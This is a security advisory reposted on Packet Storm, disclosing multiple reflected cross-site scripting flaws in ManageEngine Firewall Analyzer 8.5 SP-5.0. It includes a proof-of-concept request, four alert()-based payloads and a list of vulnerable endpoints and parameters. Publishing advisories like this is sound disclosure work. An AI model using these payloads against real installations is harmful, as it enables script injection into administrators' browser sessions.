what you don't know can hurt you

ManageEngine Firewall Analyzer 8.5 SP-5.0 Cross Site Scripting

ManageEngine Firewall Analyzer 8.5 SP-5.0 Cross Site Scripting
Posted Feb 25, 2016
Authored by LiquidWorm | Site zeroscience.mk

ManageEngine Firewall Analyzer version 8.5 SP-5.0 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | f262697d9bea4bdef54e39a137072edd

ManageEngine Firewall Analyzer 8.5 SP-5.0 Cross Site Scripting

Change Mirror Download

ManageEngine Firewall Analyzer 8.5 SP-5.0 Multiple XSS Vulnerabilities


Vendor: Zoho Corporation Pvt. Ltd.
Product web page: https://www.manageengine.com
Affected version: 8.5 SP-5.0 (Build 8500)

Summary: ManageEngine Firewall Analyzer is an agent-less log analytics
and configuration management software that helps network administrators
to centrally collect, archive, analyze their security device logs and
generate forensic reports out of it.

Desc: Firewall Analyzer suffers from multiple reflected cross-site scripting
vulnerabilities when input passed via several parameters to several scripts is
not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.

Tested on: Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5307
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5307.php


26.01.2016
-


----
PoC:

GET /fw/addbookmark.do?module=FIREWALL&bk_url=%2ffw%2fmindex.do%3furl%3dfirereport%26reportId%3d2000000304%26tab%3dreport%26subTab%3dshowReport%26RBBGID%3d116'accesskey%3d'x'onclick%3d'alert(1)'%2f%2f HTTP/1.1
Host: 10.0.2.48

---------
Payloads:

'accesskey='x'onclick='alert(1)'//
';alert(2)//
"><script>alert(3)</script>
"-alert(4)-"

---------------------
Other GET parameters:

http://10.0.2.48/fw/addbookmark.do - module
http://10.0.2.48/fw/createProfile.do - subTab
http://10.0.2.48/fw/editUserFormPage.do - editAction
http://10.0.2.48/fw/graphs - height
http://10.0.2.48/fw/graphs - width
http://10.0.2.48/fw/index2.do - subTab
http://10.0.2.48/fw/index2.do - url
http://10.0.2.48/fw/mindex.do - RBBGID
http://10.0.2.48/fw/mindex.do - reportId
http://10.0.2.48/fw/mindex.do - subTab
http://10.0.2.48/fw/mindex.do - url
http://10.0.2.48/fw/reportFilter.do - reportId
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    13 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close